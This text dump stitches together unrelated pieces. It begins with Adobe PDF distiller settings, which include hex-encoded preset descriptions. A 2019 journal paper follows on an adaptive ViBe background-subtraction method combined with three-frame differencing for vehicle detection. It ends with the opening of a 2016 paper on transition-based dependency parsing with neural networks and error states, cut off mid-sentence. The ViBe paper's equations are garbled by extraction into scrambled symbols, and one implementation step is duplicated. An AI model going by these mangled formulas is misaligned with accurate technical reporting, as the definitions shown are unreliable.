<FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_fq3wovbfzjhkzhqcl3u7tfguii ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 DOI: 10.21307/ijanmc-2019-065 11 Research on Improved Adaptive ViBe Algorithm For Vehicle Detection Kun Jiang School of Computer Science and Engineering Xi'an Technological University Xi'an, China E-mail: 416578078@qq.com Jianguo Wang School of Computer Science and Engineering Xi'an Technological University Xi'an, China E-mail: wjg_xit@126.com Abstract—Vehicle detection is an important step in vehicle tracking and recognition in video environment. Vibe algorithm is a moving target detection algorithm based on background difference method. Based on the traditional ViBe algorithm, this paper introduces three-frame difference method combined with ViBe algorithm to speed up the elimination of ghosts, and proposes an adaptive Vibe algorithm, which defines two kinds of vehicle detection errors and their corresponding error functions. Then, according to the range of these two errors, a set of reasonable judgment methods are determined to adjust the unreasonable threshold, which ensures the adaptive updating of the background model. It improves the environmental adaptability of vehicle detection and ensures higher accuracy of vehicle detection under complex illumination conditions. Keywords-Vehicle Detection; Background Difference Method; Vibe Algorithm; Three-Frame Difference Algorithm I. INTRODUCTION Vehicle detection is the key step of video vehicle recognition, which aims to obtain the location of vehicle for further recognition. For each pixel, its background can usually be built using a model. At present, there are three methods for moving object detection: optical flow method[1], frame difference method[2], background subtraction method[3]. Based on the motion vector of pixels, the optical flow method can detect and track the target, but it has a large amount of computation and poor real-time performance. Moreover, the method lacks sensitivity to noise, illumination change and background interference. Frame difference method detects moving objects according to the difference between two or three consecutive frames. It has strong adaptability to the background change, but it does not perform well in detecting the contour of moving objects. In addition, it is very sensitive to the speed of moving objects, so it cannot effectively detect slow moving objects; background difference method is a commonly used moving object detection algorithm. The main idea is to make a distinction between each frame and background model to build the background model and get the moving foreground objects. Background difference method has the ability to adapt to the scene changes in the video background, but if the background model contains foreground objects, it may generate ghosting. Background difference method is one of the most widely used vehicle detection methods because of its fast and accurate. Traditional background subtraction algorithms include Gaussian mixture model (GMM)[4] and codebook[5]. GMM method is simple and low cost. However, the initialization time is too long and the algorithm is complex to meet the real-time requirements. Cookbook has the advantages of dealing with time fluctuations well, but its memory consumption is quite high. In 2011, Olivier barnechand International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 12 Marc van droogenbroeck proposed the vibe algorithm [6]. Because the algorithm only needs the first frame to complete the model initialization, it can meet the real-time requirements compared with GMM model. In addition, in the process of execution, the algorithm only needs to record the corresponding sample set for each pixel, so it has smaller memory consumption. In addition, vibe algorithm has goodanti noise ability. Although the foreground object can be mixed in pixel initialization, it will produce ghost phenomenon. In this paper, an improved adaptive algorithm of vibe is proposed, and a moving target detection method based on three frame difference method is introduced. Through experimental verification, the algorithm proposed in this paper effectively solves the problems of "ghost" existing in traditional VIB algorithm and insufficient adaptability to complex light environment. It has the advantages of simple algorithm, good real-time performance and high detection accuracy. II. VIBE BACKGROUND MODELING The vibe background modeling algorithm was proposed by Olivier barnech et al in 2011.[7] can be used for fast background extraction and moving object detection. Vibe algorithm uses two mechanisms of random selection and neighborhood propagation to build and update the background model, which includes three steps: background modeling and initialization, foreground detection and background model update. In this paper, based on the traditional vibe algorithm, an adaptive background model of vibe is added. According to the range of vehicle detection error, a set of judgment method is determined to evaluate the rationality of the current threshold. When the threshold is not reasonable, adjust according to a certain step to ensure that the background model is updated automatically, and finally get more accurate vehicle detection results. Initialization of background model x v represents the pixel value at point x, and each pixel builds the number of background sample sets N ( 20N ):  },,,{)( 21 NvvvxM    As shown in Fig. 1, the gray space makes the region centered on X, the radius of the gray space ))(( xvS R is R , and the threshold min# is set( 2min#  ). Then find the intersection of )(xM and ))(( xvSR , C is the total number of elements in the intersection:   }},,{))(({)(# 21 nR vvvxvSxMC    Figure 1. ViBe background model. The initialization of vibe model only needs the first image, but only one image does not contain the spatial information of pixels. According to the similar spatial characteristics of the close pixels, the sample set is filled with the approximate pixels. When the first image is input, the background model of the pixels in the image is as follows (3):  )}(|{)( 00 xNyyvxM G   International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 13 Where, )(xNG represents the neighborhood pixel; 0 v is the currently selected pixel. The probability that the pixels in )(xNG are selected in N initialization is NN /)1(  . A. Foreground detection After initialization, vehicle detection starts from the second image. Separating foreground target and background is the process of moving target detection. At time t , the pixel value of random pixel x is tv , According to formula (2) C is judged according to formula (4):        )background(min# )foreground(min# C C v t   T ( 20T ) is a preset threshold. When the number of times for the background is greater than the threshold min# , the pixel x are considered to belong to the background area; if not, it belongs to the foreground target area. According to formula (4), the binary image obtained after vehicle detection is the initial vehicle detection binary image. B. Dynamic update of background model In the process of updating the vibe background model, not only the relationship between the current pixel and its historical samples, but also the relationship between the current pixel and other pixels in other spatial neighborhood should be considered. In other words, the updating of vibe background model is a random process in both time and space. In the background model in the previous frame, if the current pixel tv is marked as background, its background model )(xM t is updated in time. If the current pixel is marked as vehicle, the model is not updated. This update strategy is called conservative update strategy. The method of updating the background model is to randomly select the sample m in the sample set )(xM t . The method to update the background model in space is to calculate the gradient amplitude of the current pixel tv , If the gradient amplitude is greater than 50, the space update is not implemented. Otherwise, in the 8 neighborhood of the current pixel t v , randomly select the pixel marked as tv , in the background model )(xM t of pixel tv randomly select a sample jm , and the characteristic value of the current pixel tv is assigned to jm . If the current pixel tv is at the edge of the image, it is randomly selected in its incomplete 8 neighborhood. The spatial update strategy ensures the continuity of spatial information in the background image. III. ADAPTIVE VIBE BACKGROUND MODEL In the vibe background model, threshold R represents the range of background eigenvalues (as shown in Figure 1). Threshold R has a great influence on vehicle detection results. If the fixed threshold value is greater than the expected threshold value, it should be the vehicle's area, which will lead to inaccurate detection of the vehicle area. A. Error functions of vehicle There are several situations of vehicle detection error: the detection background area is mistakenly International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 14 regarded as the vehicle area, or the vehicle area is mistakenly regarded as the background area. The former belongs to the error vehicle area; the latter is the error background area. The size of these two types of error areas will change with the change of threshold R . When the threshold R is very small, the fluctuation range of the sample eigenvalues in the vibe background model is also very small, which helps to improve the detection accuracy of the vehicle area. The noise area may be mistakenly regarded as the wrong vehicle area, and the small noise area can be removed by morphological method, but the large noise area will not be easily removed. Therefore, in order to prevent this situation, it is necessary to minimize the wrong vehicle area. In theory, the wrong vehicle area is part of the background and it is static. Therefore, if the connected region does not overlap all the moving regions in the binary mapping of frame difference, the connected region is considered as the wrong vehicle region, and the error function of the wrong vehicle region can be defined as:  WL a RErr n i i     1 1 1 1 )(   Where, i a 1 is the ith connected domain, which does not overlap all moving regions in the binary mapping of frame difference, and 1 n is the number of such connected domains. Is the total area of the wrong vehicle area, L and W represent the length and width of the image respectively, and their units are pixels. The higher the resolution of the image, the more accurate the value of   1 1 1 n i i a . The wrong vehicle area function is defined as the ratio of the total area of the wrong vehicle area to the total area of the image. When the threshold value R is large, the fluctuation range of the sample eigenvalues in the vibe background model is also large, which is conducive to improving the detection accuracy of the background region. The second type of error area is to detect the area originally belonging to the vehicle as the background area [9]. Firstly, error background area error i a 2 is defined, which represents the difference between the area of the smallest external rectangle containing the ith vehicle and the area of the same vehicle detected. is is the area of the smallest external rectangle containing the first vehicle, and iv is the area of the ith vehicle detected.  iii vsa  2   Therefore, error background area error function can be further defined as:  2 1 2 2 2 )( n a RErr n i i     Where 2 n is the number of vehicles.   1 1 2 n i i a is the total area of the wrong vehicle area, take the average value to the error )( 2 RErr of the wrong background area. From the above, the error )( 1 RErr of the error background area and the error )( 2 RErr of the error vehicle area are obtained. The total error of the error area can be defined as:  )()()( 21 RErrRErrRErr    International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 15 B. Adaptive adjustment of threshold If the current threshold R is too small, the area of the area originally belonging to the background and mistakenly detected as the vehicle is too large, which means that the area )(1 RErr of the wrong vehicle area is relatively large. If the current threshold is too large, the area )(2 RErr of the area originally belonging to the vehicle and mistakenly detected as the background is too small, which means that the area of the wrong background is relatively large. According to this situation, we use the following adaptive scheme[10]:          elseRR TRErrandTRErrifelseNRR TRErrifNRR , )()(, )(, 21 2   1 T and 2 T is the parameter to judge the rationality of threshold, and N is the adjustment step of threshold R . After a lot of experiments, the range of 1 T is 0.02 to 0.04,the range of 2 T is 0.13 to 0.26, the range of N is 1 to 3. A large number of experiments show that these values can ensure that the total error of the error background area and the error vehicle area proposed in this paper can be minimized. IV. IMPROVED ADAPTIVE VIBE ALGORITHM OF THREE FRAME DIFFERENCE METHOD This paper presents an improved adaptive vibe background modeling algorithm, which uses the vibe algorithm to model the background, adjusts the threshold adaptively, and then introduces the three frame difference method to improve. Vibe background model algorithm is based on the first image to establish the background model[10], but the traditional vibe algorithm will appear the phenomenon of "ghost". At present, many domestic and foreign literatures have carried out relevant research on the problem of "ghost". At present, the more commonly used method is to combine the traditional vibe algorithm with other algorithms, or to change the initialization of the first image of the original algorithm to a multi frame image Initialization. The traditional vibe algorithm needs hundreds of frames to completely eliminate the "ghost" in the first frame. Using the improved adaptive vibe background modeling algorithm, the speed of eliminating the "ghost" is accelerated, and the "ghost" can be eliminated within dozens of frames. At the same time, the proposed adaptive vibe algorithm greatly improves the traditional vibe background modeling algorithm for complex light environment detection. After the introduction of three frame difference method, the speed of eliminating "ghost" is obviously speeded up, and the problem of "hole" existing in the three frame difference method itself is solved. Finally, the accuracy of moving object detection is improved by morphological processing of detection results. The flow chart of the improved vibe algorithm based on the three frame difference method is shown in Figure 2, and the specific implementation steps are as follows: 1) Input video image, and carry out image pre-processing such as graying and binarization. 2) Background modeling of three frame difference method and background modeling of vibe algorithm are carried out respectively for the image preprocessed. The final image is the "and" of the image calculated by the two methods. 3) Background modeling of three frame difference method and background modeling of vibe algorithm are carried out respectively for the image preprocessed. The final image is the "and" of the image calculated by the two methods. 4) Through the adaptive threshold adjustment algorithm proposed in this paper, the appropriate threshold is calculated to update the current background. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 16 5) The updated image is processed by morphology to get the final detection results. Figure 2. Improved ViBe algorithm of three frame difference method. V. EXPERIMENTAL RESULT Based on the above theory and processing flow, the algorithm is tested in the following environment: operating system: Microsoft Windows 10, experimental platform: Visual Studio 2019, CPU: intel5, RAM: 8g, third-party open source library: openCV 4.1.0. In order to verify that the method proposed in this paper can accurately detect moving objects in complex environment, the video selected in this experiment is the road monitoring video with more vehicles. This video is the traffic situation of a certain intersection at a certain time, with 650 frames in total, and the frame size is 640*480. An improved three frame difference algorithm based on vibe background modeling is used to detect moving vehicles. During the experiment, the 20th frame, 122 frame and 380 frame of video image sequence are randomly selected to analyze the detection effect. 20th frames122th frames380th frames (a) Original video (b) Original ViBe algorithm (c) Gaussian mixture model (d) Three frame difference method (e) Improved ViBe algorithm Figure 3. Comparison between the algorithm in this paperand the traditional target detection algorithm. It can be seen from Figure 3 that the original vibe algorithm of frame 20 has obvious ghost phenomenon and interference of complex lighting environment factors, and the effect of Gaussian mixture model is good, but the calculation of Gaussian mixture model is too complex to meet the real-time requirements of vehicle detection, the real-time performance of three frame difference method is good but the accuracy is not high enough, and there is an obvious "empty" phenomenon. In contrast, this algorithm effectively solves the ghost phenomenon and reduces the impact of complex environmental factors. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 17 TABLE I. EVALUATION RESULTS OF VEHICLE INSPECTION GMM Three frame difference Original vibe Improve d ViBe Recall 72.1% 70.0% 80.5% 87.1% Precision 91.2% 83.1% 90.2% 92.3% F1 80.1% 80.0% 85.1% 90.0% VI. CONCLUSION In order to solve the ghost phenomenon in vibe algorithm and the problem of low detection accuracy in complex illumination environment, this paper first proposes an adaptive threshold vibe algorithm in order to update the background accurately under the condition of complex illumination change. By defining two kinds of vehicle detection error functions, according to the error range calculated by these two functions, an algorithm is used to determine the rationality of threshold. Vehicle detection and background update are performed by using the adaptive algorithm. In order to solve the problem of ghost, three frame difference method and adaptive vibe algorithm are introduced. Finally, the experimental results show that the improved adaptive vibe algorithm can effectively remove the "ghost" phenomenon and improve the accuracy of vehicle detection in complex lighting environment. Figure 4 shows the change of the number of ghost pixels with the number of frames. The X axis represents the number of frames, and the Y axis represents the number of ghost pixels. It can be seen from the figure that the improved algorithm in this paper greatly accelerates the ghost elimination speed, which is significantly faster than the Gaussian mixture algorithm and the vibe algorithm. Figure 4. Ghost elimination speed. REFERENCES [1] Delpiano J, Jara J, Scheer J, et al. Performance of optical flow techniques for motion analysis of fluorescent point signals in confocal microscopy. Machine Vision & Applications, 2012, 23(4):675-689. [2] J.-G. Yan, W.-H Xu. Moving object real-time detection algorithm based on new frame difference. Computer Engineering & Design, 2013, 34(12):4331-4335. [3] Yang W, Zhang T. A new method for the detection of moving targets in complex scenes. Journal of Computer Research & Development, 1998. [4] Kaewtrakulpong P, Bowden R. An improved adaptive background mixture model for realtime tracking with shadow detection. Springer US, 2002. [5] Kim K, Chalidabhongse T H, Harwood D, et al. Real-time foreground– background segmentation using codebook model. Real-Time Imaging, 2005, 11(3):172-185. [6] Barnich O, Van D M. ViBe: a universal background subtraction algorithm for video sequences. IEEE Transactions on Image Processing A Publication of the IEEE Signal Processing Society, 2011, 20(6):1709-1724. [7] Barnich O, Van Droogenbroeck M. ViBe: A unrsal background subtraction algorithm for video sequences[J]. IEEE Transactions on Image Processing, 2011, 20(6):1709-1724. [8] Hu Changhui, Lu Xiaobo, Ye Mengjun, Zeng Weili. Singular value decomposition and local near neighbors for face recognition under varying illumination [J]. Pattern Recognition, 2017,64: 60-83. [9] Z. Qiming and M. ChengQian, A vehicle detection method in tunnel video based on ViBe algorithm,2017 IEEE 2nd Advanced Information Technology, Electronic and Automation Control Conference (IAEAC), Chongqing, 2017, pp. 1545-1548. [10] C. Pan, Z. Zhu, L. Jiang, M. Wang and X. Lu, "Adaptive ViBe background model for vehicle detection," 2017 IEEE 2nd Advanced Information Technology, Electronic and Automation Control Conference (IAEAC), Chongqing, 2017, pp. 1301-1305. [11] Ekpar F. A framework for intelligent video surveillance. Proceedings of the IEEE 8th International Conference on Computer and Information Technology Workshops. Sydney, QLD, Australia. 2008. 421–426. work_fsexunhxlrhe3giv4462rvneza ---- Efficient Structured Inference for Transition-Based Parsing with Neural Networks and Error States Ashish Vaswani∗ USC Information Sciences Institute vaswani@usc.edu Kenji Sagae∗ USC Institute for Creative Technologies sagae@usc.edu Abstract Transition-based approaches based on local classification are attractive for dependency parsing due to their simplicity and speed, despite producing results slightly below the state-of-the-art. In this paper, we propose a new approach for approximate structured in- ference for transition-based parsing that pro- duces scores suitable for global scoring us- ing local models. This is accomplished with the introduction of error states in local train- ing, which add information about incorrect derivation paths typically left out completely in locally-trained models. Using neural net- works for our local classifiers, our approach achieves 93.61% accuracy for transition-based dependency parsing in English. 1 Introduction Transition-based parsing approaches based on local classification of parser actions (Nivre, 2008) remain attractive due to their simplicity, despite producing results slightly below the state-of-the-art. Although the application of online structured prediction and beam search has made transition-based parsing com- petitive in accuracy (Zhang and Clark, 2008; Huang et al., 2012) while retaining linear time complex- ity, greedy inference with locally-trained classifiers is still widely used, and techniques for improving the performance of greedy parsing have been pro- posed recently (Choi and Palmer, 2011; Goldberg and Nivre, 2012; Goldberg and Nivre, 2013; Hon- nibal et al., 2013). Recent work on the applica- tion of neural network classification to drive greedy transition-based dependency parsing has achieved high accuracy (Chen and Manning, 2014), showing ∗Both authors contributed equally to this paper. how effective locally-trained neural network mod- els are at predicting parser actions, while providing a straightforward way to improve parsing accuracy using word embeddings pre-trained using a large set of unlabeled data. We propose a novel approach for approximate structured inference for transition-based parsing that uses locally-trained neural networks that, unlike pre- vious local classification approaches, produce scores suitable for global scoring. This is accomplished with the introduction of error states in local training, which add information about incorrect derivation paths typically left out completely in locally-trained models. Our approach produces high accuracy for transition-based dependency parsing in English, sur- passing parsers based on the structured perceptron (Huang and Sagae, 2010; Zhang and Nivre, 2011) by allowing seamless integration of pre-trained word embeddings, while requiring nearly none of the fea- ture engineering typically associated with parsing with linear models. Trained without external re- sources or pre-trained embeddings, our neural net- work (NN) dependency parser outperforms the NN transition-based dependency parser from Chen and Manning (2014), which uses pre-trained word em- beddings trained on external data and more features, thanks to improved search. Our experiments show that naive search produces very limited improve- ments in accuracy compared to greedy inference, while search in conjunction with error states that mark incorrect derivations produces substantial ac- curacy improvements. 2 Background: Transition-Based Parsing Transition-based approaches are attractive in depen- dency parsing for their algorithmic simplicity and straightforward data-driven application. Using shift- 183 Transactions of the Association for Computational Linguistics, vol. 4, pp. 183–196, 2016. Action Editor: Marco Kuhlmann. Submission batch: 5/2015; Revision batch: 8/2015; Published 5/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. reduce algorithms, such as those pioneered by Nivre (2008), the task of finding a dependency structure becomes that of predicting each action in the deriva- tion of desired structure. 2.1 Arc-Standard Dependency Parsing Our parsing models are based on a simple shift- reduce algorithm for dependency parsing known as the arc-standard dependency parsing algorithm (Nivre, 2008). An arc-standard dependency parser maintains one or more parser states T , each com- posed of a stack S = [sm, ...,s1,s0] (where the topmost item is s0) and input buffer W = [w0,w1, ...,wn] (where the first element of the buffer is w0). In its initial state T0, the stack is empty, and the input buffer contains each token in the input sen- tence with its part-of-speech tag. One of three ac- tions can be applied to a parser state Ti to create a new parser state Tj: shift, which takes the next word in the input buffer (with its part-of-speech tag), and places it as a tree with a single node on top of the stack (i.e. input token w0 is consumed to create the new stack item s0); reduce-right, which pops the top two items on the stack, s0 and s1, and pushes onto the stack a new subtree formed by attaching the root node of s0 as a dependent of s1; and reduce-left, which pops the top two items on the stack, s0 and s1, and pushes onto the stack a new subtree formed by attaching the root node of s1 as a dependent of s0. An alternative formulation keeps only word indices in the stack and input buffer, and includes an addi- tional set of dependency arcs; the two formulations are equivalent. A greedy arc-standard parser keeps only one parser state, choosing at each step one parser action to apply to the current state, which is replaced once application of the chosen action creates the next state. Once the current state is a final state, parsing terminates. A final state is one where the input buffer is empty, and the stack contains only one element, which is the dependency tree output. Given a way to score parser actions instead of simply choosing one action to apply, a state score can be defined on the sequence of actions resulting in the state. Keeping track of multiple states with scores resulting from the application of different valid actions for a sin- gle state creates an exponential search space. Beam search can then be applied to search for a high scor- ing state. With global estimation of parameters for scoring parser actions, a beam search can produce more accurate results than greedy parsing by mini- mizing global loss (Zhang and Clark, 2008). 2.2 Local Classification Initial data-driven transition-based dependency parsing approaches employed locally-trained multi- class models to choose a parser action based on the parser state at each step in the derivation (Yamada and Matsumoto, 2003; Nivre and Scholz, 2004). In these models, classification is based on a set of fea- tures extracted from the current state of the parser, and creating training examples for the classifier requires only running the transition-based algorithm to reproduce the trees in a training treebank, while recording the features and actions at each step. A classifier is then trained with the actions as classes. While this simple procedure has allowed for train- ing of dependency parsers using off-the-shelf clas- sifier implementations, the resulting parsers are re- stricted to performing greedy search, considering only one tree out of the exponentially many. Al- though the distribution of class scores for each parser state can be used to create a search space for beam search, the locally normalized scores obtained with these classifiers make searching a largely futile endeavor, since action scores cannot be combined meaningfully to score entire trees or entire deriva- tions. For example, Zhao et al. (2013) use max- imum entropy classification for local classification of shift-reduce parsing actions with a dynamic pro- gramming approach based on the work of Huang and Sagae (2010). Despite using exact search, Zhao et al. report an improvement of only 0.6% in unlabeled dependency accuracy over greedy parsing, reaching an accuracy of 90.7%, far below the 92.2% obtained with a comparable structured perceptron parser with beam search and very similar features (Huang et al., 2012). Similarly, Johansson and Nugues (2006), who used probability estimates from local SVM classification to perform a beam search in transition- based parsing, report some accuracy gains when us- ing a beam of size 2, but no further gains with larger beams. Because transition scores out of each state are normalized locally, the quality of any particular state is in no way captured by the scores that will ultimately result in the overall score for the deriva- 184 tion. In fact, from an incorrect parser state, more incorrect transitions may follow, due to a version of the label bias problem faced by MEMMs (Lafferty et al., 2001; McCallum et al., 2000). In Section 3, we will present our approach that significantly im- proves search with locally normalized models. 2.3 Structured Perceptron One effective way to create models that score parser transitions globally and allow for effective search is to use the structured perceptron (Collins, 2002). Un- like with local classifiers, weight updates are based on entire derivations, instead of individual states. However, because exact inference is too costly for transition-based parsing with a rich feature set, in practice parsers use beam search to perform ap- proximate inference, and care must be taken to en- sure the validity of weight updates (Huang et al., 2012). A widely used approach is to employ early updates, which stop parsing and perform weight up- 